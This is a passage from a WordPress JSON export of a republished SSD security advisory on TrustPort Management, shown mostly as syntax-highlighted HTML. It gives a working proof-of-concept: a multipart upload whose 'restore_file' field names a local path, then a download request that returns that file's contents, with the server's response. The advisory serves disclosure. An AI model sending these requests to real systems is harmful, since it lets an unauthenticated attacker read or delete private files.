class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-15\"><span 
class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-16\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;restore_file&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;exploit.txt&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-17\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">plain<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-19\"><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">txt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-20\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span 
class=\"crayon-e\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-21\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;action&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-23\"><span class=\"crayon-v\">upload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-24\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p>Then to disclose\/delete the contents of C:private.txt:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc9762278283\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px 
!important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/get\/manage-get-stations-add.php?action=download&amp;key=restore_bkp_ HTTP\/1.1  Host: VULNERABLE_HOST:20394  Connection: close  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5ae0fedea1cc9762278283-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc9762278283-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc9762278283-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc9762278283-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc9762278283-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">manage<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">stations<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">add<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">download<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">restore_bkp_ <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">VULNERABLE_HOST<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20394<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-3\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-5\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-6\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Mozilla<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc9762278283-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc9762278283-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>And response:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1ccb041849153\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px 
!important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK   Date: Sun, 04 Mar 2018 18:02:26 GMT  Set-Cookie: GUISESSID=cc025911b45268643cbeb8e87aa30cc3; path=\/  Pragma:  Expires: Mon, 26 Jul 1997 05:00:00 GMT  Last-Modified: Sun, 04 Mar 2018 18:02:26 GMT  Cache-Control: post-check=0, pre-check=0, false  Content-type: application\/download  Content-Disposition: attachment; filename=&#8221;export.csv&#8221;  Content-transfer-encoding: binary  Content-Length: 21    This is private data.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" 
style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1ccb041849153-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1ccb041849153-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-2\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">Sun<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2018<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-3\"><span class=\"crayon-v\">Set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GUISESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">cc025911b45268643cbeb8e87aa30cc3<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-4\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-5\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Jul<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1997<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-6\"><span class=\"crayon-v\">Last<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Modified<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Sun<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2018<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-7\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">download<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">attachment<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;export.csv&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">transfer<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">binary<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-11\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">21<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1ccb041849153-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1ccb041849153-13\"><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3685\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 25 Apr 2018 08:36:14 +0000<\/strong><\/p>\n<p>Vulnerability Summary Multiple vulnerabilities in TrustPort&#8217;s management product allow remote unauthenticated attackers to cause the product to execute arbitrary code. TrustPort Management &#8220;offers you an effective and practical way to install centrally, configure and update antivirus software in your network and it enables mass administration of TrustPort products. 
Central administration from TrustPort brings you simple &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3685\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; TrustPort Management Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-12134","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12134"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12134\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12134"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}